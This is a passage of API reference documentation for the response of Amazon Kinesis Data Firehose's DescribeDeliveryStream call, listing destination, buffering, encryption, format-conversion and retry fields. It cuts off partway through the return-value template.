This is the server-side encryption (SSE) status for the delivery stream. For a full description of the different values of this status, see StartDeliveryStreamEncryption and StopDeliveryStreamEncryption . If this status is ENABLING_FAILED or DISABLING_FAILED , it is the status of the most recent attempt to enable or disable SSE, respectively.
FailureDescription (dict) --
Provides details in case one of the following operations fails due to an error related to KMS: CreateDeliveryStream , DeleteDeliveryStream , StartDeliveryStreamEncryption , StopDeliveryStreamEncryption .
Type (string) --
The type of error that caused the failure.
Details (string) --
A message providing details about the error that caused the failure.
DeliveryStreamType (string) --
The delivery stream type. This can be one of the following values:
DirectPut : Provider applications access the delivery stream directly.
KinesisStreamAsSource : The delivery stream uses a Kinesis data stream as a source.
VersionId (string) --
Each time the destination is updated for a delivery stream, the version ID is changed, and the current version ID is required when updating the destination. This is so that the service knows it is applying the changes to the correct version of the delivery stream.
CreateTimestamp (datetime) --
The date and time that the delivery stream was created.
LastUpdateTimestamp (datetime) --
The date and time that the delivery stream was last updated.
Source (dict) --
If the DeliveryStreamType parameter is KinesisStreamAsSource , a SourceDescription object describing the source Kinesis data stream.
KinesisStreamSourceDescription (dict) --
The KinesisStreamSourceDescription value for the source Kinesis data stream.
KinesisStreamARN (string) --
The Amazon Resource Name (ARN) of the source Kinesis data stream. For more information, see Amazon Kinesis Data Streams ARN Format .
RoleARN (string) --
The ARN of the role used by the source Kinesis data stream. For more information, see AWS Identity and Access Management (IAM) ARN Format .
DeliveryStartTimestamp (datetime) --
Kinesis Data Firehose starts retrieving records from the Kinesis data stream starting with this timestamp.
Destinations (list) --
The destinations.
(dict) --
Describes the destination for a delivery stream.
DestinationId (string) --
The ID of the destination.
S3DestinationDescription (dict) --
[Deprecated] The destination in Amazon S3.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ExtendedS3DestinationDescription (dict) --
The destination in Amazon S3.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --
The data processing configuration.
Enabled (boolean) --
Enables or disables data processing.
Processors (list) --
The data processors.
(dict) --
Describes a data processor.
Type (string) --
The type of processor.
Parameters (list) --
The processor parameters.
(dict) --
Describes the processor parameter.
ParameterName (string) --
The name of the parameter.
ParameterValue (string) --
The parameter value.
S3BackupMode (string) --
The Amazon S3 backup mode.
S3BackupDescription (dict) --
The configuration for backup in Amazon S3.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
DataFormatConversionConfiguration (dict) --
The serializer, deserializer, and schema for converting data from the JSON format to the Parquet or ORC format before writing it to Amazon S3.
SchemaConfiguration (dict) --
Specifies the AWS Glue Data Catalog table that contains the column information. This parameter is required if Enabled is set to true.
RoleARN (string) --
The role that Kinesis Data Firehose can use to access AWS Glue. This role must be in the same account you use for Kinesis Data Firehose. Cross-account roles aren\'t allowed.
CatalogId (string) --
The ID of the AWS Glue Data Catalog. If you don\'t supply this, the AWS account ID is used by default.
DatabaseName (string) --
Specifies the name of the AWS Glue database that contains the schema for the output data.
TableName (string) --
Specifies the AWS Glue table that contains the column information that constitutes your data schema.
Region (string) --
If you don\'t specify an AWS Region, the default is the current Region.
VersionId (string) --
Specifies the table version for the output data schema. If you don\'t specify this version ID, or if you set it to LATEST , Kinesis Data Firehose uses the most recent version. This means that any updates to the table are automatically picked up.
InputFormatConfiguration (dict) --
Specifies the deserializer that you want Kinesis Data Firehose to use to convert the format of your data from JSON. This parameter is required if Enabled is set to true.
Deserializer (dict) --
Specifies which deserializer to use. You can choose either the Apache Hive JSON SerDe or the OpenX JSON SerDe. If both are non-null, the server rejects the request.
OpenXJsonSerDe (dict) --
The OpenX SerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the native Hive / HCatalog JsonSerDe.
ConvertDotsInJsonKeysToUnderscores (boolean) --
When set to true , specifies that the names of the keys include dots and that you want Kinesis Data Firehose to replace them with underscores. This is useful because Apache Hive does not allow dots in column names. For example, if the JSON contains a key whose name is "a.b", you can define the column name to be "a_b" when using this option.
The default is false .
CaseInsensitive (boolean) --
When set to true , which is the default, Kinesis Data Firehose converts JSON keys to lowercase before deserializing them.
ColumnToJsonKeyMappings (dict) --
Maps column names to JSON keys that aren\'t identical to the column names. This is useful when the JSON contains keys that are Hive keywords. For example, timestamp is a Hive keyword. If you have a JSON key named timestamp , set this parameter to {"ts": "timestamp"} to map this key to a column named ts .
(string) --
(string) --
HiveJsonSerDe (dict) --
The native Hive / HCatalog JsonSerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the OpenX SerDe.
TimestampFormats (list) --
Indicates how you want Kinesis Data Firehose to parse the date and timestamps that may be present in your input data JSON. To specify these format strings, follow the pattern syntax of JodaTime\'s DateTimeFormat format strings. For more information, see Class DateTimeFormat . You can also use the special value millis to parse timestamps in epoch milliseconds. If you don\'t specify a format, Kinesis Data Firehose uses java.sql.Timestamp::valueOf by default.
(string) --
OutputFormatConfiguration (dict) --
Specifies the serializer that you want Kinesis Data Firehose to use to convert the format of your data to the Parquet or ORC format. This parameter is required if Enabled is set to true.
Serializer (dict) --
Specifies which serializer to use. You can choose either the ORC SerDe or the Parquet SerDe. If both are non-null, the server rejects the request.
ParquetSerDe (dict) --
A serializer to use for converting data to the Parquet format before storing it in Amazon S3. For more information, see Apache Parquet .
BlockSizeBytes (integer) --
The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.
PageSizeBytes (integer) --
The Parquet page size. Column chunks are divided into pages. A page is conceptually an indivisible unit (in terms of compression and encoding). The minimum value is 64 KiB and the default is 1 MiB.
Compression (string) --
The compression code to use over data blocks. The possible values are UNCOMPRESSED , SNAPPY , and GZIP , with the default being SNAPPY . Use SNAPPY for higher decompression speed. Use GZIP if the compression ratio is more important than speed.
EnableDictionaryCompression (boolean) --
Indicates whether to enable dictionary compression.
MaxPaddingBytes (integer) --
The maximum amount of padding to apply. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 0.
WriterVersion (string) --
Indicates the version of row format to output. The possible values are V1 and V2 . The default is V1 .
OrcSerDe (dict) --
A serializer to use for converting data to the ORC format before storing it in Amazon S3. For more information, see Apache ORC .
StripeSizeBytes (integer) --
The number of bytes in each stripe. The default is 64 MiB and the minimum is 8 MiB.
BlockSizeBytes (integer) --
The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.
RowIndexStride (integer) --
The number of rows between index entries. The default is 10,000 and the minimum is 1,000.
EnablePadding (boolean) --
Set this to true to indicate that you want stripes to be padded to the HDFS block boundaries. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is false .
PaddingTolerance (float) --
A number between 0 and 1 that defines the tolerance for block padding as a decimal fraction of stripe size. The default value is 0.05, which means 5 percent of stripe size.
For the default values of 64 MiB ORC stripes and 256 MiB HDFS blocks, the default block padding tolerance of 5 percent reserves a maximum of 3.2 MiB for padding within the 256 MiB block. In such a case, if the available size within the block is more than 3.2 MiB, a new, smaller stripe is inserted to fit within that space. This ensures that no stripe crosses block boundaries and causes remote reads within a node-local task.
Kinesis Data Firehose ignores this parameter when OrcSerDe$EnablePadding is false .
Compression (string) --
The compression code to use over data blocks. The default is SNAPPY .
BloomFilterColumns (list) --
The column names for which you want Kinesis Data Firehose to create bloom filters. The default is null .
(string) --
BloomFilterFalsePositiveProbability (float) --
The Bloom filter false positive probability (FPP). The lower the FPP, the bigger the Bloom filter. The default value is 0.05, the minimum is 0, and the maximum is 1.
DictionaryKeyThreshold (float) --
Represents the fraction of the total number of non-null rows. To turn off dictionary encoding, set this fraction to a number that is less than the number of distinct keys in a dictionary. To always use dictionary encoding, set this threshold to 1.
FormatVersion (string) --
The version of the file to write. The possible values are V0_11 and V0_12 . The default is V0_12 .
Enabled (boolean) --
Defaults to true . Set it to false if you want to disable format conversion while preserving the configuration details.
RedshiftDestinationDescription (dict) --
The destination in Amazon Redshift.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
ClusterJDBCURL (string) --
The database connection string.
CopyCommand (dict) --
The COPY command.
DataTableName (string) --
The name of the target table. The table must already exist in the database.
DataTableColumns (string) --
A comma-separated list of column names.
CopyOptions (string) --
Optional parameters to use with the Amazon Redshift COPY command. For more information, see the "Optional Parameters" section of Amazon Redshift COPY command . Some possible examples that would apply to Kinesis Data Firehose are as follows:
delimiter \'\\t\' lzop; - fields are delimited with "t" (TAB character) and compressed using lzop.
delimiter \'|\' - fields are delimited with "|" (this is the default delimiter).
delimiter \'|\' escape - the delimiter should be escaped.
fixedwidth \'venueid:3,venuename:25,venuecity:12,venuestate:2,venueseats:6\' - fields are fixed width in the source, with each width specified after every column in the table.
JSON \'s3://mybucket/jsonpaths.txt\' - data is in JSON format, and the path specified is the format of the data.
For more examples, see Amazon Redshift COPY command examples .
Username (string) --
The name of the user.
RetryOptions (dict) --
The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon Redshift. Default value is 3600 (60 minutes).
DurationInSeconds (integer) --
The length of time during which Kinesis Data Firehose retries delivery after a failure, starting from the initial request and including the first attempt. The default value is 3600 seconds (60 minutes). Kinesis Data Firehose does not retry if the value of DurationInSeconds is 0 (zero) or if the first delivery attempt takes longer than the current value.
S3DestinationDescription (dict) --
The Amazon S3 destination.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --
The data processing configuration.
Enabled (boolean) --
Enables or disables data processing.
Processors (list) --
The data processors.
(dict) --
Describes a data processor.
Type (string) --
The type of processor.
Parameters (list) --
The processor parameters.
(dict) --
Describes the processor parameter.
ParameterName (string) --
The name of the parameter.
ParameterValue (string) --
The parameter value.
S3BackupMode (string) --
The Amazon S3 backup mode.
S3BackupDescription (dict) --
The configuration for backup in Amazon S3.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ElasticsearchDestinationDescription (dict) --
The destination in Amazon ES.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
DomainARN (string) --
The ARN of the Amazon ES domain. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Kinesis Data Firehose uses either ClusterEndpoint or DomainARN to send data to Amazon ES.
ClusterEndpoint (string) --
The endpoint to use when communicating with the cluster. Kinesis Data Firehose uses either this ClusterEndpoint or the DomainARN field to send data to Amazon ES.
IndexName (string) --
The Elasticsearch index name.
TypeName (string) --
The Elasticsearch type name. This applies to Elasticsearch 6.x and lower versions. For Elasticsearch 7.x, there\'s no value for TypeName .
IndexRotationPeriod (string) --
The Elasticsearch index rotation period
BufferingHints (dict) --
The buffering options.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300 (5 minutes).
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MBs, before delivering it to the destination. The default value is 5.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MB/sec, the value should be 10 MB or higher.
RetryOptions (dict) --
The Amazon ES retry options.
DurationInSeconds (integer) --
After an initial failure to deliver to Amazon ES, the total amount of time during which Kinesis Data Firehose retries delivery (including the first attempt). After this time has elapsed, the failed documents are written to Amazon S3. Default value is 300 seconds (5 minutes). A value of 0 (zero) results in no retries.
S3BackupMode (string) --
The Amazon S3 backup mode.
S3DestinationDescription (dict) --
The Amazon S3 destination.
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --
The data processing configuration.
Enabled (boolean) --
Enables or disables data processing.
Processors (list) --
The data processors.
(dict) --
Describes a data processor.
Type (string) --
The type of processor.
Parameters (list) --
The processor parameters.
(dict) --
Describes the processor parameter.
ParameterName (string) --
The name of the parameter.
ParameterValue (string) --
The parameter value.
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
VpcConfigurationDescription (dict) --
The details of the VPC of the Amazon ES destination.
SubnetIds (list) --
The IDs of the subnets that Kinesis Data Firehose uses to create ENIs in the VPC of the Amazon ES destination. Make sure that the routing tables and inbound and outbound rules allow traffic to flow from the subnets whose IDs are specified here to the subnets that have the destination Amazon ES endpoints. Kinesis Data Firehose creates at least one ENI in each of the subnets that are specified here. Do not delete or modify these ENIs.
The number of ENIs that Kinesis Data Firehose creates in the subnets specified here scales up and down automatically based on throughput. To enable Kinesis Data Firehose to scale up the number of ENIs to match throughput, ensure that you have sufficient quota. To help you calculate the quota you need, assume that Kinesis Data Firehose can create up to three ENIs for this delivery stream for each of the subnets specified here. For more information about ENI quota, see Network Interfaces in the Amazon VPC Quotas topic.
(string) --
RoleARN (string) --
The ARN of the IAM role that you want the delivery stream uses to create endpoints in the destination VPC.
SecurityGroupIds (list) --
The IDs of the security groups that Kinesis Data Firehose uses when it creates ENIs in the VPC of the Amazon ES destination.
(string) --
VpcId (string) --
The ID of the Amazon ES destination\'s VPC.
SplunkDestinationDescription (dict) --
The destination in Splunk.
HECEndpoint (string) --
The HTTP Event Collector (HEC) endpoint to which Kinesis Data Firehose sends your data.
HECEndpointType (string) --
This type can be either "Raw" or "Event."
HECToken (string) --
A GUID you obtain from your Splunk cluster when you create a new HEC endpoint.
HECAcknowledgmentTimeoutInSeconds (integer) --
The amount of time that Kinesis Data Firehose waits to receive an acknowledgment from Splunk after it sends it data. At the end of the timeout period, Kinesis Data Firehose either tries to send the data again or considers it an error, based on your retry settings.
RetryOptions (dict) --
The retry behavior in case Kinesis Data Firehose is unable to deliver data to Splunk or if it doesn\'t receive an acknowledgment of receipt from Splunk.
DurationInSeconds (integer) --
The total amount of time that Kinesis Data Firehose spends on retries. This duration starts after the initial attempt to send data to Splunk fails. It doesn\'t include the periods during which Kinesis Data Firehose waits for acknowledgment from Splunk after each attempt.
S3BackupMode (string) --
Defines how documents should be delivered to Amazon S3. When set to FailedDocumentsOnly , Kinesis Data Firehose writes any data that could not be indexed to the configured Amazon S3 destination. When set to AllDocuments , Kinesis Data Firehose delivers all incoming records to Amazon S3, and also writes failed documents to Amazon S3. Default value is FailedDocumentsOnly .
S3DestinationDescription (dict) --
The Amazon S3 destination.>
RoleARN (string) --
The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
BucketARN (string) --
The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
Prefix (string) --
The "YYYY/MM/DD/HH" time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .
ErrorOutputPrefix (string) --
A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .
BufferingHints (dict) --
The buffering option. If no value is specified, BufferingHints object default values are used.
SizeInMBs (integer) --
Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.
We recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.
IntervalInSeconds (integer) --
Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.
CompressionFormat (string) --
The compression format. If no value is specified, the default is UNCOMPRESSED .
EncryptionConfiguration (dict) --
The encryption configuration. If no value is specified, the default is no encryption.
NoEncryptionConfig (string) --
Specifically override existing encryption information to ensure that no encryption is used.
KMSEncryptionConfig (dict) --
The encryption key.
AWSKMSKeyARN (string) --
The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
ProcessingConfiguration (dict) --
The data processing configuration.
Enabled (boolean) --
Enables or disables data processing.
Processors (list) --
The data processors.
(dict) --
Describes a data processor.
Type (string) --
The type of processor.
Parameters (list) --
The processor parameters.
(dict) --
Describes the processor parameter.
ParameterName (string) --
The name of the parameter.
ParameterValue (string) --
The parameter value.
CloudWatchLoggingOptions (dict) --
The Amazon CloudWatch logging options for your delivery stream.
Enabled (boolean) --
Enables or disables CloudWatch logging.
LogGroupName (string) --
The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.
LogStreamName (string) --
The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.
HasMoreDestinations (boolean) --
Indicates whether there are more destinations available to list.
Exceptions
Firehose.Client.exceptions.ResourceNotFoundException
:return: {
'DeliveryStreamDescription': {
'DeliveryStreamName': 'string',
'DeliveryStreamARN': 'string',
'DeliveryStreamStatus': 'CREATING'|'CREATING_FAILED'|'DELETING'|'DELETING_FAILED'|'ACTIVE',
'FailureDescription': {
